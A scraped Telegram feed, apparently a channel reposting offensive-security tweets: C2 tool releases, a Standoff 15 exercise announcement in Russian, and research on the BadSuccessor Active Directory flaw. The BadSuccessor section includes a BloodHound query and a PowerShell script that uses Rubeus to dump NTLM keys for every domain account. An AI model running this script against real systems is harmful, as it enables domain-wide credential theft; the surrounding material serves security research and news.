Forwarded from Standoff 365
😱 Кажется, начинается... Кибербитва Standoff 15 стартует уже на следующей неделе!
С 21 по 24 мая в «Лужниках» во время PHDays Fest состоится международная кибербитва Standoff 15, которая объединит более 40 команд атакующих и защитников из 18 стран.
На кону красных — $50 000 и статус сильнейших белых хакеров.
На кону синих — прокачка навыков на живых атаках и бесценный опыт.
Что ждет участников:
✈️ Семь отраслей вирутального государства F, включая две новые, — металлургия, энергетика, нефтегазовая отрасль, банковский сектор, городская среда, авиация и логистика.
🤜 Красные попробуют реализовать более 120 критических событий, а синие будут участвовать в режимах расследования и реагирования (в этом году останавливать кибератаки будет больше команд).
🔥 Мы подготовили обновленную визуализацию: в виртуальном мире все будет похоже на игру, а в физическом реальные последствия кибератак можно будет увидеть своими глазами на макетах отраслей с интерактивным полом и мегаэкраном.
🤝 Но Standoff 15 — это не только про кибербитву. Это еще и про людей и коммьюнити: это твой шанс встретиться с теми, кого знаешь только по никам, пожать руку легендам, завести новые знакомства, обменяться опытом и хорошо потусить.
💬 Чтобы не пропустить самое интересное, смотрите расписание кибербитвы на сайте. И следите за анонсами — скоро расскажем больше о том, что можно будет увидеть в зоне Standoff.
❗️Вход в зону Standoff, которая будет располагаться в отдельном шатре, возможен только по билетам PHDays Fest с 22 мая❗️
С 21 по 24 мая в «Лужниках» во время PHDays Fest состоится международная кибербитва Standoff 15, которая объединит более 40 команд атакующих и защитников из 18 стран.
На кону красных — $50 000 и статус сильнейших белых хакеров.
На кону синих — прокачка навыков на живых атаках и бесценный опыт.
Что ждет участников:
✈️ Семь отраслей вирутального государства F, включая две новые, — металлургия, энергетика, нефтегазовая отрасль, банковский сектор, городская среда, авиация и логистика.
🔥 Мы подготовили обновленную визуализацию: в виртуальном мире все будет похоже на игру, а в физическом реальные последствия кибератак можно будет увидеть своими глазами на макетах отраслей с интерактивным полом и мегаэкраном.
❗️Вход в зону Standoff, которая будет располагаться в отдельном шатре, возможен только по билетам PHDays Fest с 22 мая❗️
Please open Telegram to view this post
VIEW IN TELEGRAM
🥱9👍7
😈 [ Rémi GASCOU (Podalirius) @podalirius_ ]
🚀 Launching TheManticoreProject – a long-term offensive & defensive security ecosystem in Go!
First release (the core library): Manticore 🐾
🔧 Modular Go library to craft & interact with network protocols.
⚙️ SMB support coming soon.
🌐
🔗 https://github.com/TheManticoreProject/Manticore
🐥 [ tweet ]
🚀 Launching TheManticoreProject – a long-term offensive & defensive security ecosystem in Go!
First release (the core library): Manticore 🐾
🔧 Modular Go library to craft & interact with network protocols.
⚙️ SMB support coming soon.
🌐
🔗 https://github.com/TheManticoreProject/Manticore
🐥 [ tweet ]
🔥3👍1
😈 [ mert @merterpreter ]
Did you know that if S1 is installed in your environment, you can gain SYSTEM privileges without running a getsystem command from your C2 by editing SentinelOne's Autorepair task? Needs localadmin priv
🐥 [ tweet ]
Did you know that if S1 is installed in your environment, you can gain SYSTEM privileges without running a getsystem command from your C2 by editing SentinelOne's Autorepair task? Needs localadmin priv
🐥 [ tweet ]
🥱9👍3
😈 [ chompie @chompie1337 ]
Me and the homies are dropping browser exploits on the red team engagement 😎. Find out how to bypass WDAC + execute native shellcode using this one weird trick -- exploiting the V8 engine of a vulnerable trusted application.
🔗 https://www.ibm.com/think/x-force/operationalizing-browser-exploits-to-bypass-wdac
🐥 [ tweet ]
Me and the homies are dropping browser exploits on the red team engagement 😎. Find out how to bypass WDAC + execute native shellcode using this one weird trick -- exploiting the V8 engine of a vulnerable trusted application.
🔗 https://www.ibm.com/think/x-force/operationalizing-browser-exploits-to-bypass-wdac
🐥 [ tweet ]
🔥8
😈 [ blasty @bl4sty ]
ok ok fine, for old time's sake
🔗 https://haxx.in/files/limit-your-screentime.sh
🐥 [ tweet ]
ok ok fine, for old time's sake
🔗 https://haxx.in/files/limit-your-screentime.sh
🐥 [ tweet ]
👍9🔥5🥱4
😈 [ Oliver Lyak @ly4k_ ]
The Future of Certipy and the Release of v5 & ESC16 👇
🔗 https://github.com/ly4k/Certipy/discussions/270
🐥 [ tweet ]
The Future of Certipy and the Release of v5 & ESC16 👇
🔗 https://github.com/ly4k/Certipy/discussions/270
🐥 [ tweet ]
🔥8🥱3
😈 [ Bad Sector Labs @badsectorlabs ]
Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on 🏟️Ludus with our new role:
🔗 https://github.com/badsectorlabs/ludus_adaptix_c2
🐥 [ tweet ]
Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on 🏟️Ludus with our new role:
🔗 https://github.com/badsectorlabs/ludus_adaptix_c2
🐥 [ tweet ]
🔥21🤔1😢1
😈 [ mpgn @mpgn_x64 ]
Thanks to the awesome work of @LadhaAleem , the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public! 🔥
You can build the lab and pwn the AD — 13 flags to capture! No public write-up exists yet — waiting for someone to submit one!
🔗 https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024
🐥 [ tweet ]
Thanks to the awesome work of @LadhaAleem , the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public! 🔥
You can build the lab and pwn the AD — 13 flags to capture! No public write-up exists yet — waiting for someone to submit one!
🔗 https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024
🐥 [ tweet ]
🔥12
😈 [ Matt Ehrnschwender @M_alphaaa ]
I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.
🔗 https://github.com/MythicAgents/tetanus
🐥 [ tweet ]
I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.
🔗 https://github.com/MythicAgents/tetanus
🐥 [ tweet ]
эх вот би все в мире переписать на раст 🦀 👍🏻 🦀 👍🏻😁13🍌3👍2
😈 [ Steve S. @0xTriboulet ]
rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.
🔗 https://github.com/0xTriboulet/rssh-rs
🐥 [ tweet ]
rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.
🔗 https://github.com/0xTriboulet/rssh-rs
🐥 [ tweet ]
👍1
😈 [ Yehuda Smirnov @yudasm_ ]
What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:
🔗 https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/
🐥 [ tweet ]
What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:
🔗 https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/
🐥 [ tweet ]
🔥9🥱2👍1
😈 [ Yuval Gordon @YuG0rd ]
🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷♂️
Read Here -
🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
🐥 [ tweet ]
🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷♂️
Read Here -
🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
🐥 [ tweet ]
🔥9
Offensive Xwitter
😈 [ Yuval Gordon @YuG0rd ] 🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it…
😈 [ Bad Sector Labs @badsectorlabs ]
If this query hits, you're in.
🐥 [ tweet ][ quote ]
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.nameIf this query hits, you're in.
🐥 [ tweet ][ quote ]
👍5
😈 [ mpgn @mpgn_x64 ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
🔥11🥱3👍1
😈 [ David Kennedy @Cyb3rC3lt ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
🔥6👍3🥱2
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Yuval Gordon @YuG0rd ]
Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell noscript that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.
🐥 [ tweet ]
upd. автор делает что-то типа такого, если что, со своей версией рубеуса:
Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell noscript that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.
🐥 [ tweet ]
какой же разъеб 😂🤣upd. автор делает что-то типа такого, если что, со своей версией рубеуса:
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
+ @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
$res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
$rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
"$($_.sAMAccountName):$rc4"
}
😁13🔥9🥱2
😈 [ Matt Ehrnschwender @M_alphaaa ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
🔗 https://github.com/MEhrn00/boflink
Supporting blog post about it.
🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
🐥 [ tweet ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
🔗 https://github.com/MEhrn00/boflink
Supporting blog post about it.
🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
🐥 [ tweet ]
🍌7😁1
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
🔥25🥱1🍌1
😈 [ Aditya Telange @adityatelange ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
👍6🔥6